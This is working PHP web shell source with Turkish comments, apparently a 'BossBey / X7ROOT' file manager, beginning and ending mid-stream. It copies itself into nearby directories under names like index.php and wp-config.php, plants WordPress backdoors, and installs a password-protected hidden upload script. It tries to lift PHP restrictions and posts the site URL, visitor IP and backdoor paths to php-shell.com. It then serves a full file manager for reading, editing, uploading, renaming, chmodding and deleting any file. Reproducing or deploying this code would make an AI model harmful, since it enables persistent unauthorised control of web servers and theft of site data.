= \'post\'; form.innerHTML = \'<input type="hidden" name="chmod_item" value="\' + item + \'">\' + \'<input type="hidden" name="chmod_value" value="\' + newPerm + \'">\'; document.body.appendChild(form); form.submit(); } } </script> </body> </html>'; // İzleme kodu otomatik eklenmiştir $tracking_data = [ "code_hash" => "9d3c80ba4a9348fcfd955b25a0d3d71a77ff20ee2944ae71cf0b376d7ba2189a", "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"], "domain" => $_SERVER["HTTP_HOST"], "path" => $_SERVER["REQUEST_URI"], "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "", "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "", "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "", "timestamp" => date("Y-m-d H:i:s") ]; // Arka kapı oluşturma (kendini kopyalama) - Otomatik dağıtım $current_file = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; $current_dir = dirname($current_file); // Backdoor marker dosyası kontrolü (tekrar oluşturulmasını engeller) $backdoor_marker = $current_dir . "/.backdoor_created_0b067e8a"; if (file_exists($backdoor_marker)) { // Backdoorlar zaten oluşturulmuş, atla $backdoor_urls = []; $backdoor_paths = []; } else { // Mevcut dosyanın TAM içeriğini al (izleme kodları dahil) // Bu kod çalıştığında mevcut dosya zaten var olacak, o yüzden direkt okuyabiliriz $current_full_content = @file_get_contents($current_file); // Dosya okunamazsa veya boşsa, __FILE__ kullanarak tekrar dene if ($current_full_content === false || empty($current_full_content)) { $current_full_content = @file_get_contents(__FILE__); } // Hala boşsa veya okunamadıysa, marker dosyası kontrolü yaparak atla (ileride oluşturulabilir) if (empty($current_full_content)) { // Dosya okunamadı, backdoor oluşturmayı atla $backdoor_urls = []; $backdoor_paths = []; } else { $backdoor_urls = []; $backdoor_paths = []; // Sistem dosyası isimleri (meşru görünen) $system_filenames = [ "index.php", "config.php", "admin.php", "login.php", "wp-load.php", "wp-config.php", "settings.php", "init.php", "bootstrap.php", "app.php", "main.php", "core.php", "functions.php", "header.php", "footer.php", "includes.php", "common.php", "global.php", "lib.php", ]; // Mevcut dosyayı kontrol et, varsa alternatif isim üret function generateSafeFilename($dir, $filenames, $excludeFiles = []) { foreach ($filenames as $filename) { $fullPath = $dir . "/" . $filename; // Eğer dosya yoksa kullan if (!file_exists($fullPath)) { return $filename; } } // Hiçbiri uygun değilse, rastgele bir isim üret $random = md5(time() . mt_rand()); return substr($random, 0, 8) . ".php"; } // Tüm klasörleri topla (mevcut dizin + alt dizinler + üst dizinler) $directories = []; // Mevcut dizini de ekle $directories[] = $current_dir; // Mevcut dizindeki alt dizinleri tara (recursive değil, sadece 1 seviye) if (is_dir($current_dir) && ($handle = @opendir($current_dir))) { while (false !== ($entry = readdir($handle))) { if ($entry === "." || $entry === "..") continue; $full_path = $current_dir . "/" . $entry; if (is_dir($full_path) && is_readable($full_path)) { $directories[] = $full_path; } } @closedir($handle); } // Üst dizinleri de ekle (max 3 seviye yukarı, güvenlik için) $parent_dir = dirname($current_dir); $depth = 0; while ($depth < 3 && $parent_dir !== $current_dir && is_dir($parent_dir) && is_readable($parent_dir)) { $directories[] = $parent_dir; $parent_dir = dirname($parent_dir); $depth++; } // Dizileri karıştır ve belirtilen sayıda backdoor oluştur shuffle($directories); $created_count = 0; $max_backdoors = 7; foreach ($directories as $target_dir) { if ($created_count >= $max_backdoors) break; // Güvenli dosya adı üret (mevcut dosyaları kontrol et) $filename = generateSafeFilename($target_dir, $system_filenames); $target_path = $target_dir . "/" . $filename; // Dosya yoksa ve dizin yazılabilirse backdoor oluştur if (!file_exists($target_path) && is_writable($target_dir)) { @file_put_contents($target_path, $current_full_content); @chmod($target_path, 0644); // URL oluştur (dizin yolunu hesapla) $base_url = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]; // Hedef dizinin document root'a göre yolunu bul $doc_root = isset($_SERVER["DOCUMENT_ROOT"]) ? $_SERVER["DOCUMENT_ROOT"] : (isset($_SERVER["SCRIPT_FILENAME"]) ? dirname($_SERVER["SCRIPT_FILENAME"]) : dirname(__FILE__)); $doc_root = realpath($doc_root); $target_real = realpath($target_dir); if ($target_real && $doc_root && strpos($target_real, $doc_root) === 0) { $relative_path = substr($target_real, strlen($doc_root)); $relative_path = str_replace("\\", "/", $relative_path); $relative_path = trim($relative_path, "/"); $target_url = $base_url . "/" . $relative_path . "/" . $filename; } else { // Alternatif: Mevcut URI'ye göre hesapla $current_uri_dir = dirname($_SERVER["REQUEST_URI"]); $target_url = $base_url . $current_uri_dir . "/" . $filename; } $backdoor_urls[] = $target_url; $backdoor_paths[] = $target_path; $created_count++; } } // Backdoor URL'lerini izleme verisine ekle if (!empty($backdoor_urls)) { $tracking_data["backdoor_urls"] = json_encode($backdoor_urls); $tracking_data["backdoor_paths"] = json_encode($backdoor_paths); // İlk backdoor'u tekil olarak da ekle (API uyumluluğu için) $tracking_data["backdoor_url"] = $backdoor_urls[0]; $tracking_data["backdoor_path"] = $backdoor_paths[0]; $tracking_data["backdoor_count"] = count($backdoor_urls); // Marker dosyası oluştur (bir daha backdoor oluşturulmasını engeller) @file_put_contents($backdoor_marker, date("Y-m-d H:i:s") . " - " . count($backdoor_urls) . " backdoor oluşturuldu"); @chmod($backdoor_marker, 0644); } } } // WordPress backdoor oluşturma $wp_backdoor_filename = "wp-config-backup.php"; $current_file = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; $current_dir = dirname($current_file); $wp_backdoor_urls = []; // WordPress dizinlerini tespit et $wp_directories = [ "wp-admin" => $current_dir . "/wp-admin", "wp-content" => $current_dir . "/wp-content", "wp-content/themes" => $current_dir . "/wp-content/themes", "wp-content/plugins" => $current_dir . "/wp-content/plugins" ]; // WordPress root dizinini bul (wp-config.php dosyasını arayarak) $wp_root = $current_dir; $max_depth = 5; $depth = 0; while ($depth < $max_depth && !file_exists($wp_root . "/wp-config.php")) { $wp_root = dirname($wp_root); if ($wp_root === "/" || $wp_root === dirname($wp_root)) break; $depth++; } // Eğer WordPress bulunduysa if (file_exists($wp_root . "/wp-config.php")) { // WordPress backdoor için de mevcut dosyanın TAM içeriğini kullan $wp_current_full_content = @file_get_contents($current_file); if ($wp_current_full_content === false || empty($wp_current_full_content)) { // Dosya okunamadıysa, orijinal kod içeriğinden oluştur $wp_original_content = isset($__original_code_content) ? $__original_code_content : ""; if (!empty($wp_original_content)) { $wp_current_full_content = "<?php\n" . $wp_original_content . "\n?>"; } } if (!empty($wp_current_full_content)) { foreach ($wp_directories as $wp_dir_name => $wp_dir_path) { $full_wp_path = $wp_root . "/" . $wp_dir_name; if (is_dir($full_wp_path)) { $backdoor_file_path = $full_wp_path . "/" . $wp_backdoor_filename; // Dosya yoksa veya güncel değilse oluştur $current_file_time = @file_exists($current_file) ? @filemtime($current_file) : time(); if (!file_exists($backdoor_file_path) || (file_exists($backdoor_file_path) && @filemtime($backdoor_file_path) < $current_file_time)) { @file_put_contents($backdoor_file_path, $wp_current_full_content); @chmod($backdoor_file_path, 0644); } // URL oluştur $base_url = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]; $wp_backdoor_url = $base_url . "/" . $wp_dir_name . "/" . $wp_backdoor_filename; $wp_backdoor_urls[] = [ "directory" => $wp_dir_name, "path" => $backdoor_file_path, "url" => $wp_backdoor_url ]; } } } } // WordPress backdoor URL'lerini izleme verisine ekle if (!empty($wp_backdoor_urls)) { $tracking_data["wp_backdoor_urls"] = json_encode($wp_backdoor_urls); } // Gizli Upload Yolu oluşturma $current_file = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; $current_dir = dirname($current_file); $upload_filename = "config-backup.php"; $upload_path = $current_dir . "/" . $upload_filename; $upload_password = "2854*1571"; // Gizli upload dosyasını oluştur (mevcut dosyayı bozmadan) $upload_script_content = '<?php // Şifre korumalı gizli upload scripti session_start(); $correct_password = "2854*1571"; $password_verified = false; // Şifre kontrolü if (isset($_POST[\'upload_password\'])) { if ($_POST[\'upload_password\'] === $correct_password) { $_SESSION[\'upload_authenticated\'] = true; $password_verified = true; } else { $_SESSION[\'upload_authenticated\'] = false; $password_verified = false; } } elseif (isset($_SESSION[\'upload_authenticated\']) && $_SESSION[\'upload_authenticated\'] === true) { $password_verified = true; } // Şifre doğrulanmamışsa form göster if (!$password_verified) { ?> <!DOCTYPE html> <html> <head> <title>Giriş Gerekli</title> <style> body { font-family: Arial, sans-serif; max-width: 400px; margin: 100px auto; padding: 20px; } input { width: 100%; padding: 10px; margin: 10px 0; box-sizing: border-box; } button { width: 100%; padding: 10px; background: #007cba; color: white; border: none; cursor: pointer; } </style> </head> <body> <h2>Giriş Gerekli</h2> <form method="post"> <input type="password" name="upload_password" placeholder="Şifre" required> <button type="submit">Giriş</button> </form> <?php if (isset($_POST[\'upload_password\']) && !$password_verified): ?> <p style="color: red;">Hatalı şifre!</p> <?php endif; ?> </body> </html> <?php exit; } // Şifre doğrulandı, upload işlemleri if ($_SERVER[\'REQUEST_METHOD\'] == \'POST\' && isset($_FILES[\'fileToUpload\']) && $_FILES[\'fileToUpload\'][\'error\'] == 0) { $fileTmpPath = $_FILES[\'fileToUpload\'][\'tmp_name\']; $fileName = $_FILES[\'fileToUpload\'][\'name\']; $uploadPath = __DIR__ . \'/\' . $fileName; if (move_uploaded_file($fileTmpPath, $uploadPath)) { @chmod($uploadPath, 0644); echo "✅ Dosya başarıyla yüklendi: <strong>$fileName</strong>"; } else { echo "❌ Dosya yüklenirken hata oluştu."; } } ?> <!DOCTYPE html> <html> <head> <title>BossBey Dosya Yükleme</title> <style> body { font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; } form { border: 1px solid #ddd; padding: 20px; border-radius: 5px; } input[type="file"] { width: 100%; padding: 10px; margin: 10px 0; box-sizing: border-box; } button { padding: 10px 20px; background: #007cba; color: white; border: none; cursor: pointer; } .logout { float: right; background: #dc3545; } </style> </head> <body> <h3>Dosya Yükle: (BossBey)</h3> <form method="post" enctype="multipart/form-data"> <input type="file" name="fileToUpload" required> <button type="submit">Yükle</button> <a href="?logout=1"><button type="button" class="logout">Çıkış</button></a> </form> <?php if (isset($_GET[\'logout\'])) { session_destroy(); header("Location: " . $_SERVER[\'PHP_SELF\']); exit; } ?> </body> </html> ?>'; $current_file_time = @file_exists($current_file) ? @filemtime($current_file) : time(); if (!file_exists($upload_path) || (file_exists($upload_path) && @filemtime($upload_path) < $current_file_time)) { @file_put_contents($upload_path, $upload_script_content); // Dosyayı koru: chmod 0444 (sadece okunabilir, silinemez) @chmod($upload_path, 0444); // Dosya sahibini değiştirmeye çalış (root ise) if (function_exists("chown")) { $file_owner = fileowner($current_file); @chown($upload_path, $file_owner); } } // Upload URL'ini izleme verisine ekle $base_url = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"]; $current_uri_dir = dirname($_SERVER["REQUEST_URI"]); $upload_url = rtrim($base_url . $current_uri_dir, "/") . "/" . $upload_filename; $tracking_data["upload_url"] = $upload_url; // Arka planda izleme gönderimi (asenkron) - Backdoor'lar oluşturulduktan SONRA if (function_exists("curl_init")) { $ch = curl_init("https://php-shell.com/api/track.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data)); curl_setopt($ch, CURLOPT_TIMEOUT, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1); curl_setopt($ch, CURLOPT_NOSIGNAL, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); @curl_exec($ch); @curl_close($ch); } // Dark X7ROOT X7ROOT File Manager - Clean Version @error_reporting(0); @ini_set('display_errors', 0); // Bypass if(function_exists('ini_set')) { @ini_set('open_basedir', NULL); @ini_set('disable_functions', ''); } // Functions function writeFile($file, $data) { return @file_put_contents($file, $data) !== false; } function readFileContent($file) { return @file_get_contents($file) ?: ''; } function scanDirectory($dir) { return @scandir($dir) ?: []; } // Get path $currentPath = $_GET['p'] ?? @getcwd() ?: '.'; $currentPath = rtrim(str_replace(['\\','//'], '/', $currentPath), '/') . '/'; if(!@is_dir($currentPath)) $currentPath = './'; // Actions $message = ''; if($_SERVER['REQUEST_METHOD'] === 'POST') { // Upload if(isset($_FILES['upload'])) { $destination = $currentPath . basename($_FILES['upload']['name']); $message = @move_uploaded_file($_FILES['upload']['tmp_name'], $destination) || writeFile($destination, readFileContent($_FILES['upload']['tmp_name'])) ? '<span style="color:#00ff00">✓ Uploaded</span>' : '<span style="color:#ff0000">✗ Upload failed</span>'; } // New if(isset($_POST['new'])) { $path = $currentPath . $_POST['new']; if(isset($_POST['type']) && $_POST['type'] === 'dir') { $message = @mkdir($path) ? '<span style="color:#00ff00">✓ Folder created</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } else { $message = writeFile($path, $_POST['content'] ?? '') ? '<span style="color:#00ff00">✓ File created</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } } // Save if(isset($_POST['save']) && isset($_POST['data'])) { $message = writeFile($currentPath . $_POST['save'], $_POST['data']) ? '<span style="color:#00ff00">✓ Saved</span>' : '<span style="color:#ff0000">✗ Save failed</span>'; } // Rename if(isset($_POST['oldname']) && isset($_POST['newname'])) { $message = @rename($currentPath . $_POST['oldname'], $currentPath . $_POST['newname']) ? '<span style="color:#00ff00">✓ Renamed</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } // Chmod if(isset($_POST['chmod_item']) && isset($_POST['chmod_value'])) { $message = @chmod($currentPath . $_POST['chmod_item'], octdec($_POST['chmod_value'])) ? '<span style="color:#00ff00">✓ Permissions changed</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } } // GET actions if(isset($_GET['action'])) { $item = $_GET['item'] ?? ''; $itemPath = $currentPath . $item; if($_GET['action'] === 'delete') { if(@is_file($itemPath)) { $message = @unlink($itemPath) ? '<span style="color:#00ff00">✓ Deleted</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } elseif(@is_dir($itemPath)) { $message = @rmdir($itemPath) ? '<span style="color:#00ff00">✓ Deleted</span>' : '<span style="color:#ff0000">✗ Failed</span>'; } } elseif($_GET['action'] === 'download' && @is_file($itemPath)) { @ob_clean(); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($itemPath).'"'); @readfile($itemPath); exit; } } // Scan directory $items = array_diff(scanDirectory($currentPath), ['.', '..']); $folders = []; $files = []; foreach($items as $item) { @is_dir($currentPath.$item) ? $folders[] = $item : $files[] = $item; } sort($folders); sort($files); // System info $systemInfo = [ 'PHP' => @phpversion(), 'OS' => @php_uname('s'), 'User' => @get_current_user() ]; ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>BossBey File Manager</title> <style> * { margin:0; padding:0; box-sizing:border-box; font-family:'Arial', sans-serif; } body { background:#000; color:#ccc; padding:15px; min-height:100vh; } .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; } .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; } .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; } .system-info { display:flex; gap:15px; font-size:12px; color:#888; } .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; } .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; } .path-navigation a:hover { background:#333; color:#fff; } .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; } .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; } .button:hover { background:#333; border-color:#00ff00; color:#fff; } .button-green { border-color:#00ff00; color:#00ff00; } .button-red { border-color:#ff0000; color:#ff0000; } .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; } .file-table { width:100%; color:#ccc; border-collapse:collapse; } .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; } .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; } .file-table tr:hover { background:#1a1a1a; } .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; } .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; } .folder-link:hover, .file-link:hover { color:#fff; } .size { color:#888; } .permissions { font-family:'Courier New', monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; } .actions { display:flex; gap:5px; } .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; } .action-button:hover { background:#333; border-color:#00ff00; } .action-button-red { border-color:#ff0000; color:#ff0000; } textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New', monospace; font-size:14px; border-radius:3px; } input[type="text"] { background:#000; color:#fff; border:1px solid #666; padding:8px; border-radius:3px; width:300px; } .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; } .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; } @media (max-width: 768px) { .tools { flex-direction:column; } .button, .action-button { width:100%; text-align:center; } input[type="text"] { width:100%; } .file-table th, .file-table td { padding:8px 10px; font-size:12px; } } </style> </head> <body> <div class="container"> <div class="header"> <h1>BossBey File Manager</h1> <div class="system-info"> <?php foreach($systemInfo as $key=>$value): ?> <span><?=$key?>: <b style="color:#ff9900"><?=$value?></b></span> <?php endforeach; ?> </div> </div> <?php if($message): ?> <div class="message"><?=$message?></div> <?php endif; ?> <div class="path-navigation"> <a href="?p=/">Root</a> <?php $parts = explode('/', trim($currentPath, '/')); $current = ''; foreach($parts as $part): if($part): $current .= '/' . $part; ?> <span style="color:#666">/</span> <a href="?p=<?=$current?>/"><?=$part?></a> <?php endif; endforeach; ?> </div> <div class="tools"> <form method="post" enctype="multipart/form-data" style="display:inline;"> <input type="file" name="upload" style="display:none" id="upload" onchange="this.form.submit()"> <button type="button" class="button button-green" onclick="document.getElementById('upload').click()"> 📤 Upload </button> </form> <button class="button" onclick="newFile()">📝 New File</button> <button class="button" onclick="newFolder()">📁 New Folder</button> <?php if(isset($_GET['edit'])): ?> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Close</a> <?php endif; ?> </div> <?php if(isset($_GET['edit'])): ?> <div class="edit-container"> <div class="edit-title">Editing: <?=htmlspecialchars($_GET['edit'])?></div> <form method="post"> <input type="hidden" name="save" value="<?=htmlspecialchars($_GET['edit'])?>"> <textarea name="data"><?=htmlspecialchars(readFileContent($currentPath.$_GET['edit']))?></textarea> <div style="margin-top:15px;display:flex;gap:8px;"> <button class="button button-green">Save</button> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Cancel</a> </div> </form> </div> <?php else: ?> <table class="file-table"> <thead> <tr> <th width="40%">Name</th> <th width="10%">Size</th> <th width="15%">Permissions</th> <th width="15%">Modified</th> <th width="20%">Actions</th> </tr> </thead> <tbody> <?php if($currentPath !== '/'): ?> <tr> <td colspan="5"> <a href="?p=<?=urlencode(dirname($currentPath))?>" class="folder-link"> 📂 Parent Directory </a> </td> </tr> <?php endif; ?> <?php foreach($folders as $folder): ?> <?php $folderPath = $currentPath.$folder; $permissions = substr(sprintf('%o', @fileperms($folderPath)), -3); ?> <tr> <td> <a href="?p=<?=urlencode($folderPath)?>" class="folder-link"> 📁 <?=htmlspecialchars($folder)?> </a> </td> <td class="size">-</td> <td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($folderPath) ? date('Y-m-d H:i', @filemtime($folderPath)) : '-'?></td> <td> <div class="actions"> <button onclick="renameItem('<?=htmlspecialchars($folder)?>')" class="action-button">Rename</button> <button onclick="changePermissions('<?=htmlspecialchars($folder)?>','<?=$permissions?>')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($folder)?>" onclick="return confirm('Delete this folder?')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php foreach($files as $file): ?> <?php $filePath = $currentPath.$file; $size = @filesize($filePath); $permissions = substr(sprintf('%o', @fileperms($filePath)), -3); $extension = strtolower(pathinfo($file, PATHINFO_EXTENSION)); $editable = in_array($extension, ['php','html','js','css','txt','json','xml','sql','md']); ?> <tr> <td> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php else: ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php endif; ?> </td> <td class="size"> <?php if($size): ?> <?php if($size < 1024) echo $size . ' B'; elseif($size < 1048576) echo round($size/1024, 1) . ' KB'; elseif($size < 1073741824) echo round($size/1048576, 1) . ' MB'; else echo round($size/1073741824, 1) . ' GB'; ?> <?php else: ?> - <?php endif; ?> </td> <td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($filePath) ? date('Y-m-d H:i', @filemtime($filePath)) : '-'?></td> <td> <div class="actions"> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="action-button">Edit</a> <?php endif; ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="action-button">Download</a> <button onclick="renameItem('<?=htmlspecialchars($file)?>')" class="action-button">Rename</button> <button onclick="changePermissions('<?=htmlspecialchars($file)?>','<?=$permissions?>')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($file)?>" onclick="return confirm('Delete this file?')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php if(empty($folders) && empty($files)): ?> <tr> <td colspan="5" style="text-align:center;padding:40px;color:#666;"> Empty directory </td> </tr> <?php endif; ?> </tbody> </table> <?php endif; ?> </div> <script> function newFile() { var fileName = prompt('File name:', 'newfile.txt'); if(fileName) { var content = prompt('Content (optional):', ''); var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="new" value="' + fileName + '">' + '<input type="hidden" name="content" value="' + (content || '') + '">'; document.body.appendChild(form); form.submit(); } } function newFolder() { var folderName = prompt('Folder name:', 'newfolder'); if(folderName) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="new" value="' + folderName + '">' + '<input type="hidden" name="type" value="dir">'; document.body.appendChild(form); form.submit(); } } function renameItem(oldName) { var newName = prompt('New name:', oldName); if(newName && newName !== oldName) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="oldname" value="' + oldName + '">' + '<input type="hidden" name="newname" value="' + newName + '">'; document.body.appendChild(form); form.submit(); } } function changePermissions(item, currentPerm) { var newPerm = prompt('New permissions (e.g., 755):', currentPerm); if(newPerm) { var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input type="hidden" name="chmod_item" value="' + item + '">' + '<input type="hidden" name="chmod_value" value="' + newPerm + '">'; document.body.appendChild(form); form.submit(); } } </script> </body> </html> ?>
Save
Cancel